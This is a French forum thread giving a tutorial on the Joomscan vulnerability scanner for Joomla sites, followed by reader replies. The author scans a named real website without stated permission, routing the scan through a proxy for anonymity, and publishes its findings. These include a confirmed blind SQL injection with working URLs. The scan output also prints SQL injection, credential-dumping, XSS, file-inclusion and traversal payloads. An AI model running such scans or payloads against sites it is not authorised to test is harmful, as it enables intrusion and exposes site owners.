Joomscan - Scanner de vulérabilité Joomla

[The_Keeg]

Plop !

Suite à mon petit tuto sur WPScan (http://www.hacksecure.fr/Thread-WPScan-S...99#pid8099)
J'ai décidé d'en faire un sur Joomscan, car comme pour WPScan, Joomscan est aussi un scanner. Mais pour Joomla! Comme l'autre scanner, il est très utile.

Sommaire :

- Introduction
- Found him !
- Fonctionnalités

- Installation
- Linux

- Utilisation
- Lancement
- Commandes

-Conclusion

1x0.0 - Introduction

Joomscan c'est quoi ? Et bien Joomscan, c'est tout simplement un scanner qui va faire de scans des site sous Joomla!
Il est également codé en perl et est capable de détecter plus de 550 vulnérabilités comme les inclusions de fichiers, les injections SQL, les failles RFI, LFI, attaques XSS, blind sql injection, protection des répertoires et autres.

Joomla! est un système de gestion de contenu (en anglais CMS pour content management system) libre, open source et gratuit. Il est écrit en PHP et utilise une base de données MySQL. Joomla! inclut des fonctionnalités telles que des flux RSS, des news, une version imprimable des pages, des blogs, des sondages, des recherches. Joomla! est sous licence GNU GPL.

Joomla!, déformation du mot arabe Jumla, veut dire : « l'ensemble de quelque chose »1. Il est créé à partir du CMS Open Source Mambo en août 2005 suite aux désaccords d'une majorité des développeurs open source avec la société propriétaire du nom Mambo. Celle-ci pour accroître sa notoriété voulait utiliser ce nom pour le CMS propriétaire qu'elle développait en parallèle. La très grande majorité des utilisateurs a rapidement suivi le mouvement.

Dans le concours 2009 du meilleur CMS open source organisé par la société britannique Packt, Joomla! est arrivé 3e dans la catégorie Best Open Source PHP Content Management System (derrière Drupal et WordPress) et 2e dans la catégorie nouvellement créée Hall of Fame Award (derrière Drupal).

Source : http://fr.wikipedia.org/wiki/Joomla!

1x1.0 - Found him !

Savoir utiliser Joomscan c'est bien mais pour ça il faut trouver des site sous Joomla! voici quelques moyens simples d'en trouver :

D'abord vous pouvez utiliser un dork (pour savoir ce qu'est un dork voir ici -> http://googledork.com/ anglophobe s'abstenir :p)

intextowered by Joomla

[spoiler][/spoiler]

Ou si vous avez un doute tester ceci :

targetjoomla.org/administrator/
// Pour accéder au login admin, l'équivalent de wp-admin sous WordPress

[spoiler][/spoiler]

Comme vous pouvez le voir, le logo en haut à gauche ne trompe pas, nous sommes bien sur un site Joomla!

Pour ce tuto nous allons utiliser tsugi.fr
Je rappelle que c'est juste des petits tests pour le tuto ! J'espère que vous comprendrez que même si des failles de sécurité importantes sont relevés, le site ne doit pas être deface, pirater ou autre ! Je vous remercie de votre compréhension.

1x2.0 - Fonctionnalités

Voici les principales fonctionnalités de Joomscan :

• Détection de la version Joomla! utilisée par le site cible
  
• Détection des plugins, modules et composants vulnérables
  
• Enumération des plugins, modules et composants vulnérables
  
• Ainsi que de quoi sécurisé son site Joomla!
  

2x0.0 - Installation

2x1.0 - Linux

Pour installer Joomscan sur Linux, vous allez ouvrir un terminal, et entrer :

wget http://web-center.si/joomscan/joomscan.tar.gz

Une archive apparaitra, et faites donc cette commande pour décompresser l'archive :

unzip joomscan.tar.gz

Voila Joomscan est installé sur votre OS, évidemment si vous ne voulez pas laisser Joomscan dans votre dossier personnel libre à vous de le déplacer. Cela ne changera rien si ce n'est le chemin du dossier.
Personnellement, ne soyez pas surpris si vous voyez "/home/keeg/hacking/scanner/joomscan"

Si vous êtes sous Backtrack 5 vous n'aurez pas besoin de l'installer.

3x0.0 - Utilisation

3x1.0 - Lancement

Tout d'abord rendez vous dans le dossier de Joomscan, par défaut :

cd /home/votre_nom/joomscan

Sous Backtrack :

cd pentest/web/scanners/joomscan

Pour moi :

cd /home/keeg/hacking/scanner/joomscan

Vous voila dans le dossier !
Pour lancer Joomscan, avec la syntaxe :

perl ./joomscan.pl <commande> <url> (commande) (argument)

Les mots entourés de "<>" sont obligatoires, et les mots entre "()" sont facultatifs.

3x2.0 - Commandes

Je vais vous présentez les commandes de se scanner afin de l'utilisé au mieux.

Voici la commande la plus utile, la commande d'aide :

perl ./joomscan.pl --help

[spoiler]
[/spoiler]

Lisez bien, c'est important !

Mettre à jour Joomscan ! Il faut le mettre à jour régulièrement tout simplement pour mettre à jour la base de donnée :

perl ./joomscan.pl update

[spoiler]

keeg@keeg-K53SD:~/hacking/scanner/joomscan$ perl ./joomscan.pl update
Switch will be removed from the Perl core distribution in the next major release. Please install the separate libswitch-perl package. It is being used at ./joomscan.pl, line 22.


..|''|| '|| '||' '|' | .|'''.| '||''|.
.|' || '|. '|. .' ||| ||.. ' || ||
|| || || || | | || ''|||. ||...|'
'|. || ||| ||| .''''|. . '|| ||
''|...|' | | .|. .||. |'....|' .||.


OWASP Joomla! Vulnerability Scanner Database Update
© Aung Khant, http://yehg.net/lab
Update by: Web-Center, http://web-center.si


Remote Database Entries: 623
Use of uninitialized value $lastupdate in concatenation (.) or string at ./joomscan.pl line 2705.
Remote Last Update: April 4, 2012

Local Database Entries: 550 November 20, 2011
Local Last update:

Use of uninitialized value $lastupdate in string ne at ./joomscan.pl line 2708.
~Updating..

~Done successfully. have fun!

Update Note:



~[*] Time Taken: 7 sec
~[*] Send bugs, suggestions, contributions to joomscan@yehg.net

[/spoiler]

Nous allons utiliser Joomscan à présent, c'est à dire tester des failles, énumérer les vulnébailités etc ... Je vais passer par un proxy (anonymat avant tout !) :

perl ./joomscan.pl -u targetjoomla.org -x localhost:8080

Comme dit plus haut, notre cible, est le site tsugi.fr, trouver grace à un dork.

Voici les résultats de cette commande :

[spoiler]

# 21
Info -> CoreComponent: com_installer CSRF Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /administrator/components/com_installer/
Exploit: N/A
Vulnerable? No

# 22
Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /components/com_search/
Exploit: N/A
Vulnerable? No

# 23
Info -> CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability
Versions effected: 1.0.7 <=
Check: /components/com_poll/
Exploit: Send request /index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>
Vulnerable? No

# 24
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
Vulnerable? Yes

# 25
Info -> Component: Brightcode Weblinks SQL Injection Vulnerability
Version Affected: N/A
Check: /component/com__brightweblinks/
Exploit: /index.php?option=com_brightweblinks&Itemid=58&catid=1 UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No

# 26
Info -> Component: com_rss DOS Vulnerability
Versions effected: Joomla! <= 1.0.7
Check: /components/com_rss/
Exploit: /index2.php?option=com_rss&feed=test
Vulnerable? No

# 27
Info -> Component: Dada Mail Manager Component Remote File Inclusion Vulnerability
Version Affected: 2.6 <=
Check: /administrator/components/
Exploit: /administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
Vulnerable? No

# 28
Info -> Component: cgTestimonial XSS
Versions Affected: 2.2
Check: /components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
Exploit: /components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
Vulnerable? N/A

# 29
Info -> Component: Joomla Component(com_joomla-visites) Remote File Inclusion
Versions Affected: Any
Check: /administrator/components/com_joomla-visites/
Exploit: //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=
Vulnerable? No

# 30
Info -> Component: Joomla Simple File Lister module <= 1.0 Directory Traversal Vulnerability
Versions Affected: Any
Check: /index.php?option=com_content&view=article&id=[AVALIDID]&Itemid=[AVALIDID]&sflaction=dir&sflDir=../../../
Exploit: /index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../
Vulnerable? No

# 31
Info -> Component: Joomla Simple File Lister module Directory Traversal Vulnerability
Versions Affected: 1.0
Check: /index.php?option=com_content&view=article&id=[AVALIDID]&Itemid=[AVALIDID]&sflaction=dir&sflDir=../../../
Exploit: /index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../
Vulnerable? No

# 32
Info -> Component: Joomla Component com_jdirectory SQL Injection
Versions Affected: "Any"
Check: /component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0/
Exploit: /component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
Vulnerable? No

There are 4 vulnerable points in 32 found entries!

~[*] Time Taken: 13 min and 13 sec
~[*] Send bugs, suggestions, contributions to joomscan@yehg.net

[/spoiler]

Un scan est assez long, ici, 13 minutes à peu près pour 4 vulnérabilités.

Donc le site est faillible aux :

• Unprotected Administrator directory
  
• Generic: Guessable Administrator directory
  
• Core: Admin Backend Cross Site Request Forgery Vulnerability
  
• CoreComponent: com_banners Blind SQL Injection Vulnerability
  

3x2.1 - Unprotected Administrator directory

Le repertoire par défaut /administrator a été detecté. Un attaquant peu brute forcer le panneau d'administration. Lisez : http://yehg.net/lab/pr0js/view.php/MULTI...ROTECT.pdf

3x2.2 - Generic: Guessable Administrator directory

Le repertoire /admin peut être deviné. L'attaquant peut brute forcer le panneau. Comment ce protéger : http://yehg.net/lab/pr0js/view.php/MULTI...ROTECT.pdf

3x2.3 - Core: Admin Backend Cross Site Request Forgery Vulnerability

Il s'agira de berner l'administrateur avec une page web modifié (pour plus d'information cf. Faille CSRF)

3x2.4 - CoreComponent: com_banners Blind SQL Injection Vulnerability

/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1
/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2

Pour plus d'information cf. Blind SQL

Ces failles ont été trouvées par Joomscan, traduite par moi.

4x0.0 - Conclusion

Voila nous arrivons à terme de ce petit tuto, en espérant qu'il vous aura plu. Si vous avez des questions n'hésitez pas

Cordialement,

The_Keeg

[Di0Sasm]

Bien entendu ça reste à tester sur son site perso, mais pour apprendre à sécuriser un site où tester vos mieux le faire manuellement, déjà pour savoir ce que vous faite et en deux utilisait un tool qui essaye de trouver pour moi je n'aime pas trop. Même si ça reste un outil utile pour dégrossir le travaille.

[The_Keeg]

Tu as entièrement raison, par exemple la il dit qu'il y a une Blind SQL, cette Blind sera à exploité "manuellement" (pour les Blind vaut miex faire un script python ou perl sinon ça risque d'être très logn ..)

[Mad4364]

"C:\Users\trololol\Desktop\Nouveau dossier>perl ./joomscan.pl --help
Can't locate Switch.pm in @INC (@INC contains: C:/Perl/site/lib C:/Perl/lib .) a
t ./joomscan.pl line 22.
BEGIN failed--compilation aborted at ./joomscan.pl line 22."

What is the fuque ?

[supersnail]

Le message est clair, il te manque une lib perl...
STFW pour l'installer (cherche switch.pm sur google)

[S3TuP]

bon soft dans le même genre wpscan et dupral scan

[Di0Sasm]

Oui mais le but premier étant de faire son expérience, sans tool annexe pour pouvoir bien appréhender les failles possible, car avec des outils tout fait on n'apprend pas pourquoi j'ai cette erreur sur mon code alors que je pensé l'avoir corrigé.

Donc avant d'utiliser un outils pour automatiser les recherches, il vos mieux savoir de quoi on parle.

[The_Keeg]

C'est sur qu'il faut savoir ce que l'on fait ! perso j'apprend les failles manuellement j'utilise un scanner qui detecte les failles et je les exploite manuellement